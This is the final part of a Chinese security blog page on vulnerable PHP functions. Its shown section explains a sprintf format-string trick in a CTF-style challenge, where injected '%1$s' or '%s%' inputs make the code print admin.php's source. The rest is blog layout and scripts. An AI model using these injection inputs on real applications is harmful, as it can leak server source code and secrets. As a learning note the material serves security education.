<br></code></pre></td></tr></tbody></table></figure>



<h2 id="PHP格式化字符串漏洞"><a href="#PHP格式化字符串漏洞" class="headerlink" title="PHP格式化字符串漏洞"></a>PHP格式化字符串漏洞</h2><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">##%1$s  ——  这种办法原理是%1$s会将第一个参数用string类型输出，而这道题中第一个参数便是admin.php的源码，语句是：</span><br><span class="hljs-keyword">print</span>(<span class="hljs-title function_ invoke__">sprintf</span>(<span class="hljs-string">"<span class="hljs-subst">$url</span> method&amp;content_size:"</span>GET%<span class="hljs-number">1</span><span class="hljs-variable">$s</span>%d<span class="hljs-string">", <span class="hljs-subst">$detect</span>));  ## %1<span class="hljs-subst">$s</span>会以字符串格式输出<span class="hljs-subst">$detect</span>，而%d会输出0</span><br><span class="hljs-string"></span><br><span class="hljs-string">##  %s%  ——  这种办法的原理是sprintf()函数中%可以转义掉%，这样语句就变成了</span><br><span class="hljs-string">print(sprintf("</span><span class="hljs-variable">$url</span> method&amp;<span class="hljs-attr">content_size</span>:<span class="hljs-string">"GET%s%%d"</span>, <span class="hljs-variable">$detect</span>));  <span class="hljs-comment">// %d前的%被转义，因此失</span><br></code></pre></td></tr></tbody></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PHP漏洞函数</div>
      <div>https://alazymechnaic.github.io/2024/03/04/php-lou-dong-han-shu/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>alazymachine</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年3月4日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/04/owasp-top10-hui-zong/" title="OWASP top10 汇总">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">OWASP top10 汇总</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/03/04/shu-xing-qian-ming-yu-men-xian/" title="属性签名与门限">
                        <span class="hidden-mobile">属性签名与门限</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
